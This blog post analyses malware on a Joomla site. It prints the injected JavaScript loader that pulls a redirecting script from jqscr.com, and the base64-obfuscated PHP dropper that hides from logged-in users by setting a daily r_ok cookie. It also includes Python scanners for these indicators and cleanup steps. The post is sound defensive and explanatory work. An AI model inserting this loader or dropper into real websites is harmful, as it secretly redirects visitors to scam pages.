Joomla Site Infected With khutmhpx.src = jqscr.com/XXxxxXXn

On a site I support I found this infected code in the /plugins directory. The infected file injects JavaScript code into the top of the rendered HTML page, above the <head> tag. The infected file only runs once a day, per user, so it’s hard to spot.

For a user’s first visit of the day, when not logged in, a PHP script runs. The PHP injects JavaScript, that in turn injects jqscr.com/XXxxxXXn. On the page load the user gets redirected away from the site, usually to a “spammy” website.

One way to tell if a site is infected is to view the source code of the homepage in a new incognito window: is there any JavaScript above the <head> tag? Another way is to check the browser for a cookie, on the domain, named r_ok with the value of 1.

We only found this hack because this client emailed a large mailing list. When those people clicked the link, they were redirected to a spammy site. Many of them reported this strange behavior back to us.

JavaScript Injected Above The <head> Tag

The following JavaScript was injected above the head tag on a Joomla site. I redacted the page name to XXxxxXXn in the script's src, assuming the original page name is a unique tracking code. The injected script looks like this:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXxxxXXn";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>

What the code above is doing:

  1. imports the jQuery v3.3.1 script library
  2. creates var khutmhpx as a script tag
  3. sets the khutmhpx src to https://jqscr.com/XXxxxXXn
  4. appends khutmhpx to the HTML head
  5. executes khutmhpx on the page load
  6. https://jqscr.com/XXxxxXXn then redirects the visitor off the site
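The two checks described at the top of this post (a script tag sitting above <head>, and the r_ok cookie being set) can be automated. The following is an added example, not code from the original post: it scans a fetched homepage and its Set-Cookie headers for the markers shown above. Function names, the constructed sample HTML and the sample Set-Cookie line are my own; the indicator strings (jqscr.com, khutmhpx, r_ok, jquery0.com) are the ones this post reports. The optional fetch helper uses urllib, which sends no cookies, so every request looks like a "first visit of the day" to the dropper.

```python
import urllib.request

# Indicator strings reported in this post (jqscr.com here, jquery0.com in the
# older WordPress variant, khutmhpx in both).
INDICATORS = ("jqscr.com", "khutmhpx", "jquery0.com")
# Cookie name the PHP dropper sets: base64 'cl9vaw==' decodes to 'r_ok'.
GATING_COOKIE = "r_ok"


def script_before_head(html):
    """True if a <script> tag appears before the <head> tag.

    A clean Joomla template never emits scripts above <head>, so a hit is
    suspicious even when the script src is unfamiliar.
    """
    lowered = html.lower()
    script_pos = lowered.find("<script")
    if script_pos == -1:
        return False
    head_pos = lowered.find("<head")
    return head_pos == -1 or script_pos < head_pos


def indicators_in_html(html):
    """Return the known indicator strings present in the page source."""
    return [ioc for ioc in INDICATORS if ioc in html]


def parse_set_cookie(header):
    """Return (name, value) from a Set-Cookie header, ignoring attributes."""
    name, _, value = header.split(";", 1)[0].partition("=")
    return name.strip(), value.strip()


def gating_cookie_set(set_cookie_headers):
    """True if any Set-Cookie header sets r_ok=1 (the once-a-day gate)."""
    return any(parse_set_cookie(h) == (GATING_COOKIE, "1") for h in set_cookie_headers)


def scan_response(html, set_cookie_headers=()):
    """Combine the three checks into one report for a single response."""
    report = {
        "script_above_head": script_before_head(html),
        "indicators": indicators_in_html(html),
        "r_ok_cookie_set": gating_cookie_set(set_cookie_headers),
    }
    # Known indicators alone are conclusive; otherwise require both the
    # misplaced script and the gating cookie to avoid false positives.
    report["infected"] = bool(report["indicators"]) or (
        report["script_above_head"] and report["r_ok_cookie_set"]
    )
    return report


def fetch_and_scan(url):
    """Fetch a live page with a cookie-less request and scan it (network use)."""
    with urllib.request.urlopen(url, timeout=15) as resp:
        html = resp.read().decode("utf-8", errors="replace")
        cookies = resp.headers.get_all("Set-Cookie") or []
    return scan_response(html, cookies)


# Constructed samples: the injected block from this post, then a clean page.
INFECTED_SAMPLE = (
    '<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>\n'
    "<script>\n"
    'var khutmhpx = document.createElement("script");\n'
    'khutmhpx.src = "https://jqscr.com/XXxxxXXn";\n'
    'document.getElementsByTagName("head")[0].appendChild(khutmhpx);\n'
    "</script>\n"
    "<!DOCTYPE html><html><head><title>Home</title></head><body></body></html>"
)
CLEAN_SAMPLE = (
    '<!DOCTYPE html><html><head><script src="/media/jui/js/jquery.min.js">'
    "</script></head><body></body></html>"
)
# Constructed Set-Cookie header in the shape the dropper's setcookie() produces.
SET_COOKIE_SAMPLE = ["r_ok=1; expires=Sat, 23 Mar 2024 10:00:00 GMT; Max-Age=86400; path=/"]

if __name__ == "__main__":
    print(scan_response(INFECTED_SAMPLE, SET_COOKIE_SAMPLE))
    print(scan_response(CLEAN_SAMPLE, []))
```

Run it against a live site with `fetch_and_scan("https://example.invalid/")` from a machine that has not visited the site that day; a browser that already holds the r_ok cookie will get the clean page and the scan will come back empty.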

The Scope Of This Hack Is Growing

On March 22nd 2023 publicwww.com showed 196 sites infected with jqscr.com. Infections grew throughout Spring ’23 until they peaked in May, then started to decline:

  • March 22nd: 196 sites
  • April 18th: 1332 sites
  • May 4th: 1552 sites
  • June 6th: 1185 sites
  • July 21st: 994 sites
  • August 21st: 888 sites

The Infected Joomla Code (PHP)

The infected code is injected from /plugins/system/settings/settings.php. This is not part of the real Joomla settings; it is just a random PHP file in the /plugins directory. I assume it was copied there by some other Joomla plugin or component, but I do not know yet which one.

The main part of /plugins/system/settings/settings.php looks like this:

if ( $user -> id > 0 ) {
    // user route
} else {
    // non-user route
    $current_url = JUri::getInstance();
    if (stristr($current_url, "/admin")) {
        // admin-panel route
    } else {
            
        if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
            setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
            echo '
            <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
            <script>
            var khutmhpx = document.createElement("script");
            khutmhpx.src = "https://jqscr.com/XXxxxXXn";
            document.getElementsByTagName("head")[0].appendChild(khutmhpx);
            </script>
            ';
        }
    }
}

What the /plugins/system/settings/settings.php code shown above is doing:

  • if ( $user -> id > 0 ) { ignores visitors who are logged in.
  • if (stristr($current_url, "/admin")) { ignores pages in the “/admin” path; that’s a little odd because Joomla uses “/administrator/”.
  • if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) { setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) ); limits execution to just once a day by setting a cookie for 86400 seconds (24 hours). That’s a good trick: when you go back to the page to try to figure out what happened, the script will be gone.
  • echo ' <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script> var khutmhpx = document.createElement("script"); khutmhpx.src = "https://jqscr.com/XXxxxXXn"; document.getElementsByTagName("head")[0].appendChild(khutmhpx); </script> '; injects the jQuery library and JavaScript code above the <head> tag.

The cookie name base64_decode( 'cl9vaw==' ) decodes to r_ok. If the site has a cookie on your domain named r_ok, with the value of 1, the site is infected.
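Because the dropper hides its cookie name and path behind base64_decode(), a plain grep for "r_ok" across the site files finds nothing. The following is an added example, not code from the original post: it walks a Joomla /plugins tree, decodes every base64_decode('...') literal it finds so obfuscated names become readable, and flags files that carry the markers analysed above (the khutmhpx script, jqscr.com, a $_COOKIE check keyed on a base64-decoded name, and a setcookie() call whose decoded name is r_ok). The function names and the embedded sample file are mine; the indicators and the PHP excerpt in the sample are the ones this post shows.

```python
import base64
import os
import re

# Literal markers from the settings.php analysed in this post. 'cl9vaw==' is
# the base64 form of the cookie name r_ok.
STRING_INDICATORS = ("khutmhpx", "jqscr.com", "cl9vaw==")
# Any base64_decode('...') call with a string literal argument.
BASE64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# A $_COOKIE lookup whose key is itself obfuscated, as in the dropper's gate.
COOKIE_GATE = re.compile(r"isset\(\s*\$_COOKIE\[\s*base64_decode\(")


def decode_literals(php_source):
    """Return [(literal, decoded_text_or_None), ...] for each base64 literal."""
    decoded = []
    for literal in BASE64_CALL.findall(php_source):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            text = None  # not valid base64 or not text; still worth listing
        decoded.append((literal, text))
    return decoded


def analyse_php(php_source):
    """Build a report of the dropper indicators present in one PHP file."""
    literals = decode_literals(php_source)
    decoded_values = [text for _, text in literals if text is not None]
    return {
        "string_indicators": [s for s in STRING_INDICATORS if s in php_source],
        "decoded_literals": literals,
        "cookie_gated_with_obfuscated_name": bool(COOKIE_GATE.search(php_source)),
        "sets_r_ok_cookie": "setcookie" in php_source and "r_ok" in decoded_values,
    }


def is_suspicious(report):
    """Any one of the three signals is enough to warrant a manual look."""
    return (
        bool(report["string_indicators"])
        or report["cookie_gated_with_obfuscated_name"]
        or report["sets_r_ok_cookie"]
    )


def scan_plugins_dir(root):
    """Walk a Joomla /plugins tree; return {path: report} for flagged PHP files."""
    flagged = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report = analyse_php(fh.read())
            except OSError:
                continue  # unreadable file; skip rather than abort the scan
            if is_suspicious(report):
                flagged[path] = report
    return flagged


# Constructed sample: the core of the settings.php shown in this post.
SAMPLE_PHP = r"""<?php
if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
    setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
    echo '
    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <script>
    var khutmhpx = document.createElement("script");
    khutmhpx.src = "https://jqscr.com/XXxxxXXn";
    document.getElementsByTagName("head")[0].appendChild(khutmhpx);
    </script>
    ';
}
"""
CLEAN_PHP = "<?php\ndefined('_JEXEC') or die;\necho 'hello';\n"

if __name__ == "__main__":
    print(analyse_php(SAMPLE_PHP))
    # Point this at a real install, e.g. scan_plugins_dir("/var/www/site/plugins")
```

A hit on "cookie_gated_with_obfuscated_name" alone is worth reviewing even when the other markers are absent: legitimate plugins have no reason to hide the name of a cookie they read.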

Mitigation

Remove the hack by deleting the code in: /plugins/system/settings/settings.php.

What I have done for now is remove the echo of the khutmhpx injection script from settings.php and modify the cookie. The modified cookie duration is 30 days, and the value is set to “plugin disabled”. I can monitor the cookie’s value to make sure this rogue script has not been reinstalled.

setcookie( base64_decode( 'cl9vaw==' ), 'plugin disabled', time() + 86400 * 30, base64_decode( 'Lw==' ) );

I’m still not sure how this hack got onto this Joomla site. I did not build this site, and it uses a lot of plugins, about half of which I’ve never used before. So I need to backtrack and review each plugin and component that was upgraded over the last month, when the hack was installed.

Have you seen this hack? Any ideas where it came from?

Similar To A Hack On WordPress

There is/was a similar hack on WordPress websites last year, reported by Sucuri in March 2022. The injected script is 99% the same; just the target src has changed. The old src was https://jquery0.com/XXxXXxxX. Same jquery-3.3.1.min.js, same var khutmhpx, same document.getElementsByTagName("head")[0].appendChild(khutmhpx):

var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0.com/XXxXXxxX';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);

https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html

Published by

Kimball

Kimball is a website designer and developer in Goffstown, NH.

3 comments on:
“Joomla Site Infected With khutmhpx.src = jqscr.com/XXxxxXXn”

  1. Thank you too.

    I had the same issue.
    Very strange, this plugin is no longer in the Joomla 4.3.1 files.
    Don’t know when it was installed (v1.0.0, date 01-01-2022, Author Joomla! Project), strange date!
    But it can be uninstalled.
    For the moment I just deactivated the plugin and added your patch. Will do some tests before uninstallation.

    I downloaded my website files to my computer, and my antivirus (AVAST) found this infected file OK, but good news: it found only one infected file.

  2. Wow, thank you very much for providing this article.

    I spent many many hours finding the code.

    Thank you very much again.
